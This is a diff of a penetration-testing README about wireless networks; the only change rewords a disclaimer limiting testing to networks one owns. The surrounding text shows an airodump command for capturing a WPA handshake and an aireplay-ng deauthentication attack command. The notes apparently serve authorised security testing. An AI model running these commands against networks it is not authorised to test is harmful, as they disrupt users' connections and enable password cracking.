billburn/penetration-testing/Wireless/README.md

 ```

 ## Capture Handshake
-- **(NOTE: This is for testing purposes only, do NOT capture for wireless networks that you don't own)**
+- **(NOTE: This is for testing purposes only, do NOT capture packets for wireless networks that you don't own)**

 ```
 airodump --bssid <mac address of ap> --channel <id> wlan0 --output-format pcap --write <name of pcap>
 ```

 ## Deauthentication Attack
-- **(NOTE: This is for testing purposes only, do NOT capture for wireless networks that you don't own)**
+- **(NOTE: This is for testing purposes only, do NOT capture packets for wireless networks that you don't own)**
 ```
 aireplay-ng -0 1 -a <mac addredss of ap> -c <mac address of client> wlan0
 ```